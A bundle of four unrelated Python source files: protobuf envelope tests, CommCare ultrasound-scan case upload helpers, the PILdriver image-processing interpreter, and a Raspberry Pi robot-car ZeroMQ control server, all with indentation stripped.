protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(protobuf_message, Person)
assert type(result.get("data")) is Person
assert result.get("data") == data
assert result.get("metadata", {}).get("data_encoding") == "proto"
assert result.get("data") == data
assert result.get("data").name == data.name
assert result.get("data").id == data.id
assert len(MessageToJson(result.get("data"))) == len(MessageToJson(data))
assert MessageToJson(result.get("data")) == MessageToJson(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base_no_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
result, message_uuid, timestamp = await instance.message_envelope.parse_message(protobuf_message)
assert type(result.get("data")) is not Person
assert type(result.get("data")) is bytes
assert result.get("data") != data
assert result.get("data") == b"\n\x0212\x12\x08John Doe"
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base_bad_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
json_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(json_message, str)
with pytest.raises(AttributeError):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_validation_no_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
instance.message_envelope.validate()
with pytest.raises(Exception):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_validation_bad_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
instance.message_envelope.validate(proto_class=str)
with pytest.raises(Exception):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_validation_function(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_validator(person: Person) -> None:
validate_field_regex(person.name, r"^[a-zA-Z ]+$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_validator)
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_static_validation_function(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_static_validator(person: Person) -> None:
validate_field_regex(person.name, r"^[a-zA-Z ]+$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_static_validator)
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_validation_function_fail(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_validator(person: Person) -> None:
validate_field_regex(person.name, r"^(#?[a-fA-F0-9]{6}|)$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_validator)
with pytest.raises(RegexMissmatchException):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_static_validation_function_fail(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_static_validator(person: Person) -> None:
validate_field_regex(person.name, r"^(#?[a-fA-F0-9]{6}|)$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_static_validator)
with pytest.raises(RegexMissmatchException):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
|
|
from casexml.apps.case.xform import get_case_updates
from corehq.apps.receiverwrapper import submit_form_locally
from couchforms import convert_xform_to_json
from dimagi.utils.couch.database import get_db
from casexml.apps.case.models import CommCareCase
from lxml import etree
import os
from datetime import datetime, timedelta
import uuid
from django.core.files.uploadedfile import UploadedFile
from custom.uth.const import UTH_DOMAIN
import re
def scan_case(scanner_serial, scan_id):
"""
Find the appropriate case for a serial/exam id combo.
Throws an exception if there are more than one (this is
an error that we do not expect to be able to make corrections
for).
"""
    # The exam id is shown on the device and stored on the case without
    # leading zeroes, but the filename keeps them, so strip them here.
scan_id = scan_id.lstrip('0')
return get_db().view(
'uth/uth_lookup',
startkey=[UTH_DOMAIN, scanner_serial, scan_id],
endkey=[UTH_DOMAIN, scanner_serial, scan_id, {}],
).one()
def match_case(scanner_serial, scan_id, date=None):
results = scan_case(scanner_serial, scan_id)
if results:
return CommCareCase.get(results['value'])
else:
return None
def get_case_id(patient_xml):
"""
This is the case_id if it's extracted, assumed to be in the PatientID
However, there's a nonzero chance of them either forgetting to scan it
Or putting it in the wrong field like PatientsName
"""
exam_root = etree.fromstring(patient_xml)
case_id = exam_root.find("PatientID").text
if case_id == '(_No_ID_)':
return None
else:
return case_id
def get_study_id(patient_xml):
"""
The GUID the sonosite generates for the particular exam
"""
exam_root = etree.fromstring(patient_xml)
return exam_root.find("SonoStudyInstanceUID").text
def load_template(filename):
xform_template = None
template_path = os.path.join(
os.path.dirname(__file__),
'data',
filename
)
with open(template_path, 'r') as fin:
xform_template = fin.read()
return xform_template
def case_attach_block(key, filename):
return '<n0:%s src="%s" from="local"/>' % (key, os.path.split(filename)[-1])
def render_sonosite_xform(files, exam_uuid, patient_case_id=None):
"""
Render the xml needed to create a new case for a given
screening. This case will be a subcase to the `exam_uuid` case,
which belongs to the patient.
"""
xform_template = load_template('upload_form.xml.template')
case_attachments = [case_attach_block(identifier(f), f) for f in files]
exam_time = datetime.utcnow()
format_dict = {
'time_start': (exam_time - timedelta(seconds=5)).strftime('%Y-%m-%dT%H:%M:%SZ'),
'time_end': exam_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
'modified_date': exam_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
'user_id': 'uth-uploader',
'doc_id': uuid.uuid4().hex,
'case_id': uuid.uuid4().hex,
'patient_case_id': patient_case_id,
'case_attachments': ''.join(case_attachments),
'exam_id': exam_uuid,
'case_name': 'Sonosite Exam - ' + exam_time.strftime('%Y-%m-%d'),
}
final_xml = xform_template % format_dict
return final_xml
def render_vscan_error(case_id):
"""
Render the xml needed add attachments to the patients case.
"""
xform_template = load_template('vscan_error.xml.template')
format_dict = {
'time_start': (datetime.utcnow() - timedelta(seconds=5)).strftime('%Y-%m-%dT%H:%M:%SZ'),
'time_end': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'modified_date': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'user_id': 'uth-uploader',
'doc_id': uuid.uuid4().hex,
'case_id': case_id,
}
final_xml = xform_template % format_dict
return final_xml
def render_vscan_xform(case_id, files):
"""
Render the xml needed add attachments to the patients case.
"""
xform_template = load_template('vscan_form.xml.template')
case_attachments = [
case_attach_block(os.path.split(f)[-1], f) for f in files
]
format_dict = {
'time_start': (datetime.utcnow() - timedelta(seconds=5)).strftime('%Y-%m-%dT%H:%M:%SZ'),
'time_end': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'modified_date': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'user_id': 'uth-uploader',
'doc_id': uuid.uuid4().hex,
'case_id': case_id,
'case_attachments': ''.join(case_attachments),
}
final_xml = xform_template % format_dict
return final_xml
def identifier(filename):
"""
File names are of the format: 09.44.32 hrs __[0000312].jpeg and we need
to filter out the 0000312 part to use as identifier
"""
    match = re.search(r'\[(\d+)\]', filename)
if match:
return 'attachment' + match.group(1)
else:
        # if we can't match, let's hope returning the filename works
return filename
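# A small worked example (hypothetical filename, matching the format described
# in the docstring above):
#
#     identifier('09.44.32 hrs __[0000312].jpeg')  ->  'attachment0000312'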
def create_case(case_id, files, patient_case_id=None):
"""
Handle case submission for the sonosite endpoint
"""
    # we already parsed what we need from this file, so we can remove it
    # without worrying that we will need it later
files.pop('PT_PPS.XML', '')
xform = render_sonosite_xform(files, case_id, patient_case_id)
file_dict = {}
for f in files:
file_dict[f] = UploadedFile(files[f], f)
submit_form_locally(
instance=xform,
attachments=file_dict,
domain=UTH_DOMAIN,
)
# this is a bit of a hack / abstraction violation
# would be nice if submit_form_locally returned info about cases updated
case_ids = {
case_update.id
for case_update in get_case_updates(convert_xform_to_json(xform))
}
return [CommCareCase.get(case_id) for case_id in case_ids]
def attach_images_to_case(case_id, files):
"""
Handle case submission for the vscan endpoint
"""
xform = render_vscan_xform(case_id, files)
file_dict = {}
for f in files:
identifier = os.path.split(f)[-1]
file_dict[identifier] = UploadedFile(files[f], identifier)
submit_form_locally(xform, attachments=file_dict, domain=UTH_DOMAIN)
def submit_error_case(case_id):
"""
Used if something went wrong creating the real vscan
case update.
"""
xform = render_vscan_error(case_id)
submit_form_locally(
instance=xform,
domain=UTH_DOMAIN,
)
def put_request_files_in_doc(request, doc):
for name, f in request.FILES.iteritems():
doc.put_attachment(
f,
name,
)
|
|
#!/Users/kerem/github-stuff/demo-gui-python/py3env/bin/python3
"""PILdriver, an image-processing calculator using PIL.
An instance of class PILDriver is essentially a software stack machine
(Polish-notation interpreter) for sequencing PIL image
transformations. The state of the instance is the interpreter stack.
The only method one will normally invoke after initialization is the
`execute' method. This takes an argument list of tokens, pushes them
onto the instance's stack, and then tries to clear the stack by
successive evaluation of PILdriver operators. Any part of the stack
not cleaned off persists and is part of the evaluation context for
the next call of the execute method.
PILDriver doesn't catch any exceptions, on the theory that these
are actually diagnostic information that should be interpreted by
the calling code.
When called as a script, the command-line arguments are passed to
a PILDriver instance. If there are no command-line arguments, the
module runs an interactive interpreter, each line of which is split into
space-separated tokens and passed to the execute method.
In the method descriptions below, a first line beginning with the string
`usage:' means this method can be invoked with the token that follows
it. Following <>-enclosed arguments describe how the method interprets
the entries on the stack. Each argument specification begins with a
type specification: either `int', `float', `string', or `image'.
All operations consume their arguments off the stack (use `dup' to
keep copies around). Use `verbose 1' to see the stack state displayed
before each operation.
Usage examples:
`show crop 0 0 200 300 open test.png' loads test.png, crops out a portion
of its upper-left-hand corner and displays the cropped portion.
`save rotated.png rotate 30 open test.tiff' loads test.tiff, rotates it
30 degrees, and saves the result as rotated.png (in PNG format).
"""
# by Eric S. Raymond <esr@thyrsus.com>
# $Id$
# TO DO:
# 1. Add PILFont capabilities, once that's documented.
# 2. Add PILDraw operations.
# 3. Add support for composing and decomposing multiple-image files.
#
from __future__ import print_function
from PIL import Image
class PILDriver(object):
verbose = 0
def do_verbose(self):
"""usage: verbose <int:num>
Set verbosity flag from top of stack.
"""
self.verbose = int(self.do_pop())
# The evaluation stack (internal only)
stack = [] # Stack of pending operations
def push(self, item):
"Push an argument onto the evaluation stack."
self.stack.insert(0, item)
def top(self):
"Return the top-of-stack element."
return self.stack[0]
# Stack manipulation (callable)
def do_clear(self):
"""usage: clear
Clear the stack.
"""
self.stack = []
def do_pop(self):
"""usage: pop
Discard the top element on the stack.
"""
return self.stack.pop(0)
def do_dup(self):
"""usage: dup
Duplicate the top-of-stack item.
"""
        if isinstance(self.stack[0], Image.Image):  # If it's an image, do a real copy
dup = self.stack[0].copy()
else:
dup = self.stack[0]
self.push(dup)
def do_swap(self):
"""usage: swap
Swap the top-of-stack item with the next one down.
"""
self.stack = [self.stack[1], self.stack[0]] + self.stack[2:]
# Image module functions (callable)
def do_new(self):
"""usage: new <int:xsize> <int:ysize> <int:color>:
Create and push a greyscale image of given size and color.
"""
xsize = int(self.do_pop())
ysize = int(self.do_pop())
color = int(self.do_pop())
self.push(Image.new("L", (xsize, ysize), color))
def do_open(self):
"""usage: open <string:filename>
Open the indicated image, read it, push the image on the stack.
"""
self.push(Image.open(self.do_pop()))
def do_blend(self):
"""usage: blend <image:pic1> <image:pic2> <float:alpha>
Replace two images and an alpha with the blended image.
"""
image1 = self.do_pop()
image2 = self.do_pop()
alpha = float(self.do_pop())
self.push(Image.blend(image1, image2, alpha))
def do_composite(self):
"""usage: composite <image:pic1> <image:pic2> <image:mask>
Replace two images and a mask with their composite.
"""
image1 = self.do_pop()
image2 = self.do_pop()
mask = self.do_pop()
self.push(Image.composite(image1, image2, mask))
def do_merge(self):
"""usage: merge <string:mode> <image:pic1>
[<image:pic2> [<image:pic3> [<image:pic4>]]]
        Merge top-of-stack images in a way described by the mode.
"""
mode = self.do_pop()
bandlist = []
for band in mode:
bandlist.append(self.do_pop())
self.push(Image.merge(mode, bandlist))
# Image class methods
def do_convert(self):
"""usage: convert <string:mode> <image:pic1>
Convert the top image to the given mode.
"""
mode = self.do_pop()
image = self.do_pop()
self.push(image.convert(mode))
def do_copy(self):
"""usage: copy <image:pic1>
Make and push a true copy of the top image.
"""
        self.do_dup()
def do_crop(self):
"""usage: crop <int:left> <int:upper> <int:right> <int:lower>
<image:pic1>
Crop and push a rectangular region from the current image.
"""
left = int(self.do_pop())
upper = int(self.do_pop())
right = int(self.do_pop())
lower = int(self.do_pop())
image = self.do_pop()
self.push(image.crop((left, upper, right, lower)))
def do_draft(self):
"""usage: draft <string:mode> <int:xsize> <int:ysize>
Configure the loader for a given mode and size.
"""
mode = self.do_pop()
xsize = int(self.do_pop())
ysize = int(self.do_pop())
        self.top().draft(mode, (xsize, ysize))
def do_filter(self):
"""usage: filter <string:filtername> <image:pic1>
Process the top image with the given filter.
"""
from PIL import ImageFilter
imageFilter = getattr(ImageFilter, self.do_pop().upper())
image = self.do_pop()
self.push(image.filter(imageFilter))
def do_getbbox(self):
"""usage: getbbox
Push left, upper, right, and lower pixel coordinates of the top image.
"""
bounding_box = self.do_pop().getbbox()
self.push(bounding_box[3])
self.push(bounding_box[2])
self.push(bounding_box[1])
self.push(bounding_box[0])
def do_getextrema(self):
"""usage: extrema
Push minimum and maximum pixel values of the top image.
"""
        extrema = self.do_pop().getextrema()
self.push(extrema[1])
self.push(extrema[0])
def do_offset(self):
"""usage: offset <int:xoffset> <int:yoffset> <image:pic1>
Offset the pixels in the top image.
"""
        from PIL import ImageChops
        xoff = int(self.do_pop())
        yoff = int(self.do_pop())
        image = self.do_pop()
        self.push(ImageChops.offset(image, xoff, yoff))
def do_paste(self):
"""usage: paste <image:figure> <int:xoffset> <int:yoffset>
<image:ground>
Paste figure image into ground with upper left at given offsets.
"""
figure = self.do_pop()
xoff = int(self.do_pop())
yoff = int(self.do_pop())
ground = self.do_pop()
if figure.mode == "RGBA":
ground.paste(figure, (xoff, yoff), figure)
else:
ground.paste(figure, (xoff, yoff))
self.push(ground)
def do_resize(self):
"""usage: resize <int:xsize> <int:ysize> <image:pic1>
Resize the top image.
"""
ysize = int(self.do_pop())
xsize = int(self.do_pop())
image = self.do_pop()
self.push(image.resize((xsize, ysize)))
def do_rotate(self):
"""usage: rotate <int:angle> <image:pic1>
Rotate image through a given angle
"""
angle = int(self.do_pop())
image = self.do_pop()
self.push(image.rotate(angle))
def do_save(self):
"""usage: save <string:filename> <image:pic1>
Save image with default options.
"""
filename = self.do_pop()
image = self.do_pop()
image.save(filename)
def do_save2(self):
"""usage: save2 <string:filename> <string:options> <image:pic1>
Save image with specified options.
"""
filename = self.do_pop()
options = self.do_pop()
image = self.do_pop()
image.save(filename, None, options)
def do_show(self):
"""usage: show <image:pic1>
Display and pop the top image.
"""
self.do_pop().show()
def do_thumbnail(self):
"""usage: thumbnail <int:xsize> <int:ysize> <image:pic1>
Modify the top image in the stack to contain a thumbnail of itself.
"""
ysize = int(self.do_pop())
xsize = int(self.do_pop())
self.top().thumbnail((xsize, ysize))
def do_transpose(self):
"""usage: transpose <string:operator> <image:pic1>
Transpose the top image.
"""
        transpose = self.do_pop().upper()
        image = self.do_pop()
        self.push(image.transpose(getattr(Image, transpose)))
# Image attributes
def do_format(self):
"""usage: format <image:pic1>
Push the format of the top image onto the stack.
"""
self.push(self.do_pop().format)
def do_mode(self):
"""usage: mode <image:pic1>
Push the mode of the top image onto the stack.
"""
self.push(self.do_pop().mode)
def do_size(self):
"""usage: size <image:pic1>
Push the image size on the stack as (y, x).
"""
size = self.do_pop().size
self.push(size[0])
self.push(size[1])
# ImageChops operations
def do_invert(self):
"""usage: invert <image:pic1>
Invert the top image.
"""
from PIL import ImageChops
self.push(ImageChops.invert(self.do_pop()))
def do_lighter(self):
"""usage: lighter <image:pic1> <image:pic2>
Pop the two top images, push an image of the lighter pixels of both.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.lighter(image1, image2))
def do_darker(self):
"""usage: darker <image:pic1> <image:pic2>
Pop the two top images, push an image of the darker pixels of both.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.darker(image1, image2))
def do_difference(self):
"""usage: difference <image:pic1> <image:pic2>
Pop the two top images, push the difference image
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.difference(image1, image2))
def do_multiply(self):
"""usage: multiply <image:pic1> <image:pic2>
Pop the two top images, push the multiplication image.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.multiply(image1, image2))
def do_screen(self):
"""usage: screen <image:pic1> <image:pic2>
Pop the two top images, superimpose their inverted versions.
"""
from PIL import ImageChops
image2 = self.do_pop()
image1 = self.do_pop()
self.push(ImageChops.screen(image1, image2))
def do_add(self):
"""usage: add <image:pic1> <image:pic2> <int:offset> <float:scale>
Pop the two top images, produce the scaled sum with offset.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
scale = float(self.do_pop())
offset = int(self.do_pop())
self.push(ImageChops.add(image1, image2, scale, offset))
def do_subtract(self):
"""usage: subtract <image:pic1> <image:pic2> <int:offset> <float:scale>
Pop the two top images, produce the scaled difference with offset.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
scale = float(self.do_pop())
offset = int(self.do_pop())
self.push(ImageChops.subtract(image1, image2, scale, offset))
# ImageEnhance classes
def do_color(self):
"""usage: color <image:pic1>
Enhance color in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Color(image)
self.push(enhancer.enhance(factor))
def do_contrast(self):
"""usage: contrast <image:pic1>
Enhance contrast in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Contrast(image)
self.push(enhancer.enhance(factor))
def do_brightness(self):
"""usage: brightness <image:pic1>
Enhance brightness in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Brightness(image)
self.push(enhancer.enhance(factor))
def do_sharpness(self):
"""usage: sharpness <image:pic1>
Enhance sharpness in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Sharpness(image)
self.push(enhancer.enhance(factor))
# The interpreter loop
def execute(self, list):
"Interpret a list of PILDriver commands."
list.reverse()
while len(list) > 0:
self.push(list[0])
list = list[1:]
if self.verbose:
print("Stack: " + repr(self.stack))
top = self.top()
if not isinstance(top, str):
continue
funcname = "do_" + top
if not hasattr(self, funcname):
continue
else:
self.do_pop()
func = getattr(self, funcname)
func()
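# A minimal programmatic sketch (assuming a readable "test.png" exists, as in
# the usage examples in the module docstring); tokens are evaluated in stack
# order, so the file is opened first, then cropped, then shown:
#
#     driver = PILDriver()
#     driver.execute("show crop 0 0 200 300 open test.png".split())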
if __name__ == '__main__':
import sys
# If we see command-line arguments, interpret them as a stack state
# and execute. Otherwise go interactive.
driver = PILDriver()
if len(sys.argv[1:]) > 0:
driver.execute(sys.argv[1:])
else:
print("PILDriver says hello.")
while True:
try:
if sys.version_info[0] >= 3:
line = input('pildriver> ')
else:
line = raw_input('pildriver> ')
except EOFError:
print("\nPILDriver says goodbye.")
break
driver.execute(line.split())
print(driver.stack)
# The following sets edit modes for GNU EMACS
# Local Variables:
# mode:python
# End:
|
|
'''
The MIT License (MIT)
Copyright (c) 2014 Hu Dou
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import RPi.GPIO as gpio
import time
import sys
import zmq
import signal
import threading
# Motor control pins using BOARD numbering
left_front_wheel_forward_pin = 7
left_front_wheel_backward_pin = 11
right_front_wheel_forward_pin = 12
right_front_wheel_backward_pin = 13
left_rear_wheel_forward_pin = 15
left_rear_wheel_backward_pin = 16
right_rear_wheel_forward_pin = 18
right_rear_wheel_backward_pin = 22
# put all pins in a list for convenience
control_pins = [left_front_wheel_forward_pin, left_front_wheel_backward_pin, \
right_front_wheel_forward_pin, right_front_wheel_backward_pin, \
left_rear_wheel_forward_pin, left_rear_wheel_backward_pin,
right_rear_wheel_forward_pin, right_rear_wheel_backward_pin]
# IR range sensor (rs) pins
rs_trigger = 3
rs_input = 5
# Symbols used for the status of the car
Stopped = 1
Forward = 2
Backward = 3
LeftForward = 5
RightForward = 6
# Global variable to store the current car status
car_status = Stopped
# Lock to protect against race conditions while controlling the car and updating its status
car_control_lock = threading.RLock()
def setup():
'''
Setup the GPIO pins
'''
gpio.setmode(gpio.BOARD)
gpio.setwarnings(False) # Suppress the warnings complaining that the channel has been configured ...
# motor control pins
[gpio.setup(p, gpio.OUT) for p in control_pins]
# range sensor pins
gpio.setup(rs_trigger, gpio.OUT)
gpio.setup(rs_input, gpio.IN)
# set the trigger to low as the initial condition
gpio.output(rs_trigger, gpio.LOW)
def left_front_wheel_forward():
gpio.output(left_front_wheel_forward_pin, True)
gpio.output(left_front_wheel_backward_pin, False)
def left_front_wheel_backward():
gpio.output(left_front_wheel_forward_pin, False)
gpio.output(left_front_wheel_backward_pin, True)
def right_front_wheel_forward():
gpio.output(right_front_wheel_forward_pin, True)
gpio.output(right_front_wheel_backward_pin, False)
def right_front_wheel_backward():
gpio.output(right_front_wheel_forward_pin, False)
gpio.output(right_front_wheel_backward_pin, True)
def left_rear_wheel_forward():
gpio.output(left_rear_wheel_forward_pin, True)
gpio.output(left_rear_wheel_backward_pin, False)
def left_rear_wheel_backward():
gpio.output(left_rear_wheel_forward_pin, False)
gpio.output(left_rear_wheel_backward_pin, True)
def right_rear_wheel_forward():
gpio.output(right_rear_wheel_forward_pin, True)
gpio.output(right_rear_wheel_backward_pin, False)
def right_rear_wheel_backward():
gpio.output(right_rear_wheel_forward_pin, False)
gpio.output(right_rear_wheel_backward_pin, True)
def car_forward():
with car_control_lock:
left_front_wheel_forward()
right_front_wheel_forward()
left_rear_wheel_forward()
right_rear_wheel_forward()
global car_status
car_status = Forward
def car_backward():
with car_control_lock:
left_front_wheel_backward()
right_front_wheel_backward()
left_rear_wheel_backward()
right_rear_wheel_backward()
global car_status
car_status = Backward
def car_stop():
with car_control_lock:
[gpio.output(p, False) for p in control_pins]
global car_status
car_status = Stopped
def car_left_forward():
'''
Make the car turn left forward by turning the right
wheels forward and left wheels backward
'''
with car_control_lock:
left_front_wheel_backward()
left_rear_wheel_backward()
right_front_wheel_forward()
right_rear_wheel_forward()
global car_status
car_status = LeftForward
def car_right_forward():
'''
Make the car turn right forward by turning the left
wheels forward and right wheels backward
'''
with car_control_lock:
left_front_wheel_forward()
left_rear_wheel_forward()
right_front_wheel_backward()
right_rear_wheel_backward()
global car_status
car_status = RightForward
def test():
'''
A quick test of all motions
'''
car_forward()
time.sleep(2)
car_backward()
time.sleep(2)
car_left_forward()
time.sleep(2)
car_right_forward()
time.sleep(2)
car_stop()
#######################################################
# Car control commands:
# f: forward
# b: backward
# lf: left forward
# rf: right forward
# t: stop the car
#######################################################
commands = {
'f' : car_forward,
'b' : car_backward,
'lf': car_left_forward,
'rf': car_right_forward,
't' : car_stop
}
#######################################################
# To connect to the server, run a program that implements
# a zeromq client, and send commands to the server as
# specified above.
#######################################################
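#######################################################
# A minimal client sketch (not part of this module; assumes the server
# below is already running on localhost). The server binds a zmq.PAIR
# socket to TCP port 5555, so the client must connect with a PAIR
# socket as well:
#
#     import zmq
#     context = zmq.Context()
#     socket = context.socket(zmq.PAIR)
#     socket.connect('tcp://localhost:5555')
#     socket.send('f')        # drive forward
#     print socket.recv()     # 'OK f'
#     socket.send('t')        # stop
#     print socket.recv()     # 'OK t'
#     socket.send('q')        # shut the server down
#     print socket.recv()     # 'OK. Quit'
#     socket.close()
#     context.term()
#######################################################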
def run_control_server():
'''
Run a zeromq server to receive commands from the clients
Use TCP port: 5555
Valid commands are:
car control commands
q: quit the server
'''
# flag to indicate we are stopping the server
# use a single element array so it can be used in closure
# of dist_func. Simple variable won't work
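    # (Python 2 has no `nonlocal`, so rebinding a plain variable inside
    # dist_func would only create a new local there; mutating an element
    # of a list defined here works around that.)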
stop_server = [False]
# Start another thread to detect distance
# The main function of the thread
def dist_func():
print 'Distance detection thread started'
while not stop_server[0]:
# send a 10us pulse to the range sensor trigger
gpio.output(rs_trigger, True)
time.sleep(0.00001)
gpio.output(rs_trigger, False)
# Waiting for the echo to return
# Sleep 100us in between so I don't hog the CPU
# this gives me a 1.7cm resolution
# The max distance the sensor can detect is about
# 5 meters, which takes ~30ms for the echo to
# get back. If we still don't get the echo after
# 30ms, the distance is considered infinite, and
# I restart the loop again.
wait_for_echo_count = 0
while gpio.input(rs_input) == 0:
time.sleep(0.0001)
wait_for_echo_count += 1
if wait_for_echo_count == 300:
break
if wait_for_echo_count == 300:
print 'Distance: inf'
else:
starttime = time.time()
while gpio.input(rs_input) == 1:
time.sleep(0.0001)
stoptime = time.time()
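                # The echo pulse width is the round-trip time; sound travels
                # at roughly 340 m/s, so the one-way distance is
                # 340/2 * elapsed = 170 metres per second of echo time.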
dist = 170 * (stoptime - starttime)
print 'Distance: %.2fm' % dist
                # If an obstacle is closer than 15cm and the car is moving forward, stop it
global car_status
if dist <= 0.15:
with car_control_lock:
if car_status == Forward:
car_stop()
# sleep for a while
time.sleep(0.05)
print 'Distance detection thread stopped'
# Start the thread
dist_detection_thread = threading.Thread(target=dist_func)
dist_detection_thread.start()
context = zmq.Context()
socket = context.socket(zmq.PAIR) # Use PAIR sockets
print 'Listening to port 5555'
socket.bind('tcp://*:5555')
def sigint_handler(sig, frame):
'''
Intercept the SIGINT signal, close the socket, and exit
gracefully.
'''
print '\nReceived Ctrl-C'
print 'Closing the socket ...',
socket.close()
print 'done'
print 'Stopping distance detection thread...',
stop_server[0] = True
dist_detection_thread.join()
sys.exit(0)
# Set our own sigint handler
signal.signal(signal.SIGINT, sigint_handler)
while True:
cmd = socket.recv()
print 'Control server: received command ', cmd
if cmd in commands:
commands[cmd]()
socket.send('OK ' + cmd)
elif cmd == 'q':
car_stop() # stop the car before close
socket.send('OK. Quit')
socket.close()
context.term()
stop_server[0] = True
dist_detection_thread.join()
break
else:
socket.send('Err: Unknown command ' + cmd)
print 'Invalid command: ', cmd
if __name__ == '__main__':
setup()
if len(sys.argv) == 2 and sys.argv[1] == 'test':
test()
else:
run_control_server()
|